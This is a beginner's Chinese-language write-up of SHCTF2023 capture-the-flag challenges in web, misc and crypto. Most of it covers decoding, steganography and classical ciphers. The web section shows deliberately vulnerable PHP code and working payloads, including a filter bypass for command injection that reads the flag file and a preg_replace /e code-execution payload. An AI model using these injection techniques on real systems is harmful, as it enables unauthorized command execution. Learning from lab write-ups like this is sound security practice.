SHCTF2023-校外赛道WP部分
SHCTF2023-校外赛道WP部分
-
- 前言:
- Web:
-
- [WEEK1]babyRCE:
- [WEEK1]1zzphp:
- [WEEK1]ez_serialize:
- [WEEK1]登录就给flag:
- [WEEK1]飞机大战:
- [WEEK1]ezphp:
- MISC:
-
- [WEEK1]请对我使用社工吧:
- [WEEK1]也许需要一些py:
- [WEEK1]ez-misc:
- [WEEK1]Steganography:
- [WEEK1]签到题:
- [WEEK1] 真的签到:
- [WEEK1]可爱的派蒙捏:
- [WEEK1]Jaeger lover:
- [WEEK1]message:
- [WEEK2]远在天边近在眼前:
- [WEEK2]可爱的洛琪希:
- [WEEK2]喜帖街:
- [WEEK2]图片里的秘密:
- [WEEK2]表里的码:
- Crypto:
-
- [WEEK1]立正:
- [WEEK1]Crypto_Checkin:
- [WEEK1]凯撒大帝:
- [WEEK1]进制:
- [WEEK1]okk:
- [WEEK1]熊斐特:
- [WEEK1]黑暗之歌:
- [WEEK1]迷雾重重:
- [WEEK1]难言的遗憾:
- [WEEK1]小兔子可爱捏:
- Reverse:
- PWN:
前言:
由于刚接触CTF没多久 还是属于萌新级别的也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。
比赛地址:http://shctf.club/
Web:
[WEEK1]babyRCE:
$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}
Payload:?rce=c\at$IFS\../../../../../../../f\lag
flag{2deb9790-0dee-498a-8b63-1ca0bee9c7ae}
[WEEK1]1zzphp:
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
$code = (String)$_POST['c_ode'];
$num=$_GET['num'];
if(preg_match("/[0-9]/", $num))
{
die("no number!");
}
elseif(intval($num))
{
if(preg_match('/.+?SHCTF/is', $code))
{
die('no touch!');
}
if(stripos($code,'2023SHCTF') === FALSE)
{
die('what do you want');
}
echo $flag;
}
}
[WEEK1]ez_serialize:
[WEEK1]登录就给flag:
admin
password
[WEEK1]飞机大战:
F12查看源代码 js里面有url编码 在Base64解码即可。
flag{9b7846fc-2ec0-4d41-8db7-858525c0079b}
[WEEK1]ezphp:
error_reporting(0);
if(isset($_GET['code']) && isset($_POST['pattern']))
{
$pattern=$_POST['pattern'];
if(!preg_match("/flag|system|pass|cat|chr|ls|[0-9]|tac|nl|od|ini_set|eval|exec|dir|\.|\`|read*|show|file|\<|popen|pcntl|var_dump|print|var_export|echo|implode|print_r|getcwd|head|more|less|tail|vi|sort|uniq|sh|include|require|scandir|\/| |\?|mv|cp|next|show_source|highlight_file|glob|\~|\^|\||\&|\*|\%/i",$code))
{
$code=$_GET['code'];
preg_replace('/(' . $pattern . ')/ei','print_r("\\1")', $code);
echo "you are smart";
}else{
die("try again");
}
}else{
die("it is begin");
}
?>
it is begin
get: ?code=${phpinfo()}
post: pattern=(.*)
flag{afdc2798-2891-4b37-bce8-69610b0ecde8}
MISC:
[WEEK1]请对我使用社工吧:
k1sme4的朋友考到了一所在k1sme4家附近的大学,一天,
k1sme4的朋友去了学校对面的商场玩,并给k1sme4拍了一张照片,你能找到他的学校吗?
flag格式:flag{xx省_xx市_xx区_xx大学}
[WEEK1]也许需要一些py:
[WEEK1]ez-misc:
01game这里面是二进制文件 使用脚本先把他转换为二维码
扫码得到解压密码: hit_k1sme4_4_fun
输入密码解压,在右边看到一串二进制 解出来是一个字典 rockyou 应该比较熟悉了 爆破即可。
01110010011011110110001101101011011110010110111101110101
from PIL import Image
MAX = 25
pic = Image.new("RGB",(MAX, MAX))
str = "1111111011111111011000111111110000010011000101010001000001101110100011000110010010111011011101011010000100010101110110111010000111111000001011101100000100011101111010010000011111111010101010101010111111100000000000000111111100000000001011101000111010100100010010011000000101101111100010001110110010101001111010001110011101001001001100100010001000100110001001100010101001110100011010000110100110000001101111000001100111111000100101011111000110010000011111111111000111010110001110100100110011010011000011010000110011100100111011001110011010100110100111101101000110001001110101010010100100110001111101111111100010000000011110011010110001000011111110010000000001101010111100000101110100010101000100101011101011000001110011111111110111010010101001010000110100101110101111111011010001100011000001000111101111001001101011111110010100011110111100111"
i = 0
for y in range (0,MAX):
for x in range (0,MAX):
if(str[i] == '1'):
pic.putpixel([x,y],(0, 0, 0))
else:
pic.putpixel([x,y],(255,255,255))
i = i+1
pic.show()
pic.save("flag.png")
在线2进制转ASCII:https://coding.tools/cn/binary-to-text#google_vignette
得到密码:palomino 修改flag后缀zip 解压得到 一串字符 猜测是字频统计
flag{SHyk1sme4}
[WEEK1]Steganography:
将 careful1.jpg 放进 010 查看发现 Base64 编码 然后解码
然后另一张查看熟悉 进行拼接得到 解压密码: 12ercsxqwed909jk
flag{4d72e4f3-4d4f-4969-bc8c-a2f6f7a4292c}
[WEEK1]签到题:
Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5 #Base128 Base64解两次即可。
Base64在线解码:http://www.jsons.cn/base64
flag{this_is_flag}
[WEEK1] 真的签到:
关注公众号山东汉任信息安全技术有限公司,回复 SHCTF我踏马来辣! 得到flag
flag{Welc0me_tO_SHCTF2023}
[WEEK1]可爱的派蒙捏:
foremost 进行分离得到两个txt 进行对比多出来的就是flag。
在线网站:https://text-compare.com/
flag{4ebf327905288fca947a}
[WEEK1]Jaeger lover:
[WEEK1]message:
0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D
在线PDU解码:http://www.sendsms.cn/pdu/
SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}
[WEEK2]远在天边近在眼前:
打开容器下载下来 一个压缩包 套娃文件夹 一个一个拼接即可。
flag{tH1s_15_Re4llY_E4sy_4lri9ht?_ca0aee7ec705}
[WEEK2]可爱的洛琪希:
PS:把你的详细信息都交出来!
在线Bse64转图片:https://tool.jisuapi.com/base642pic.html
根据提示详细信息猜测是EXIF 在线网站 工具(exiftool)都可以
在线查看EXIF信息:https://exif.tuchong.com/view/13800262/
HEX解码得到一串字符 放入010 结尾发现key:nanian 直接艾尼维亚解密得到flag。
但是感觉这个不太对呀 换个在线网站试试 wdf!
在线维吉尼亚解密:http://www.atoolbox.net/Tool.php?Id=856
flag{Roxy_daisuki!}
[WEEK2]喜帖街:
PS:喜帖街里就得有“喜帖”,ok?
一个音频文件使用工具Audacity 右键查看频谱得到:LeeTung密码 Steghide隐写一下 得到flag。
steghide extract -sf music.wav -p LeeTung
ok在线解码:https://www.splitbrain.org/services/ook
flag{w@v2txt_s0_Int3r3st1ng!}
[WEEK2]图片里的秘密:
PS :盲僧能出水银鞋吗?
分离得到一张杰尼龟得图片 再根据提示 水印鞋?? 上工具 得到flag。
flag{Blind_Water_Mark!}
[WEEK2]表里的码:
Crypto:
[WEEK1]立正:
在线逆序:https://study.100xgj.com/textturn/
:Y Trrn dw brx~ wklv lv iodj: HpakH8wHUNDiBDC6V636gLZxHN46CN4bUEgQgN4xUNg4 ghfrgh lw
通过ROT13系列解密 23-18-5 在Base64解密即可得到flag。
flag{Y0U_MU57_5t4nd_uP_r1gHt_n0W}
[WEEK1]Crypto_Checkin:
套娃加密 分别为 Base85-64-32 然后HEX解密得到flag。
flag{Th1s_1s_B4s3_3nc0d3}
[WEEK1]凯撒大帝:
pvkq{mredsrkyxkx}
flag{chutihaonan}
[WEEK1]进制:
好熟悉的进制,但不知道加密了几层
3636366336313637376236313638363636623661366336383662363136383764 #两次即可。
flag{ahfkjlhkah}
[WEEK1]okk:
上面有贴网址 直接解码。
flag{123456789}
[WEEK1]熊斐特:
uozt{zgyzhs xrksvi}
flag{atbash cipher}
[WEEK1]黑暗之歌:
在线盲文解码:http://www.atoolbox.net/Tool.php?Id=837
Base64解码得到 音乐符号 进行解码即可。
在线音乐符号解密:https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue
flag{b2cc-9091-8a29}
[WEEK1]迷雾重重:
把0替换为. 1替换为- 可以写脚本 也可以手动。
0010 0100 01 110 1111011 11 111 010 000 0 001101 00 000 001101 0001 0 010 1011 001101 0010 001 10 1111101
..-. .-.. .- --. ----.-- -- --- .-. ... . ..--.- .. ... ..--.- ...- . .-. -.-- ..--.-
..-. ..- -. -----.-
flag{FLAGMORSE_IS_VERYUN}
[WEEK1]难言的遗憾:
题目描述:
我们本可以早些进入信息化时代的,但是清政府拒不采纳那份编码规则。 (注:flag为中文,使用flag{}包裹提交)
密文:000111310008133175592422205314327609650071810649
考点:中文电码解密
flag{一天不学高数我就魂身难受}
[WEEK1]小兔子可爱捏:
题目描述:宇宙的终极答案是什么?
U2FsdGVkX1/lKCKZm7Nw9xHLMrKHsbGQuFJU5QeUdASq3Ulcrcv9
你可能会需要一把钥匙,钥匙就是问题的答案。
在线Rabbit解密:http://www.yzcopen.com/ende/rabbit
flag{i_love_technology}